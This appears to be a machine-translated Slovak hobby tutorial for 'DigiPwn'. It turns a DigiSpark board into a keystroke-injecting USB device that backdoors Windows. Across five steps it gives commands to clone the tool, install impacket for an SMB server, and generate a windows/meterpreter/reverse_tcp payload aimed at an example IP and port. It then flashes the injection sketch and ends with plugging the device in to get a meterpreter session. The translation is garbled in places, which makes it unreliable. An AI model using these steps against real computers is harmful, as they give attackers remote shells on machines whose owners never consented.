DigiPwn: 5 krokov
DigiPwn: 5 krokov

Obsah:

Anonim
DigiPwn
DigiPwn
DigiPwn
DigiPwn

Čo tu teda robíme?

DigiSpark je malý vývojový nástroj založený na Arduine, ktorý môže fungovať ako vstup HID klávesnice. Dnes manipulujeme s týmto zariadením, aby sme backdoorovali operačný systém Windows!

Zásoby

Arduino IDE

Stroj na okná

DigiSpark

Metasploit Framework

Python 2.7 (Poznámka: Potrebujete python „2.7“, nechoďte na inú verziu)

impacket

Mozog! Pomáha to

Krok 1: Klonujte úložisko DigiPwn

Klonujte úložisko DigiPwn!
Klonujte úložisko DigiPwn!

Klon do repo GitHubu od DigiPwn od

klon git

Teraz zmeňte adresár na DigiPwn od

CD DigiPwn/

Krok 2: Nainštalujte Impacket [Moduly vyžadované spoločnosťou Python]

Tento modul je potrebný na spustenie servera SMB, ktorý je potrebný pre knižnicu užitočného zaťaženia

sudo apt-get install python-impacket

Alebo si môžete stiahnuť knižnicu impacketov a nainštalovať ju odtiaľto.

Krok 3: Umožňuje vygenerovať užitočné zaťaženie

Umožňuje generovať užitočné zaťaženie!
Umožňuje generovať užitočné zaťaženie!
Poďme vygenerovať užitočné zaťaženie!
Poďme vygenerovať užitočné zaťaženie!

Utekaj

python DigiPwn.py [HOST] [PORT] [VYPLATIŤ] [VÝSTUPNÝ SÚBOR] [formát]

napr

python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs

Teraz sa vás opýta, či chcete spustiť stager a server SMB. Stlačte y a stlačte Enter

Krok 4: Teraz nahrajte kód do Arduina

Teraz nahrajte kód do Arduina!
Teraz nahrajte kód do Arduina!

Pred odovzdaním sa musíme uistiť, že doska DigiSpark je nainštalovaná v Arduine, aby ste sa na to mohli pozrieť tu.

potom nahrajte súbor keystroke_inject.ino vygenerovaný skriptom. Akonáhle budete hotoví, ste pripravení

Krok 5: Čas zapojiť dieťa

Čas zapojiť dieťa!
Čas zapojiť dieťa!

Teraz zapojte DigiSpark a počkajte 10 sekúnd

BOOM Je spustená relácia meterpreter!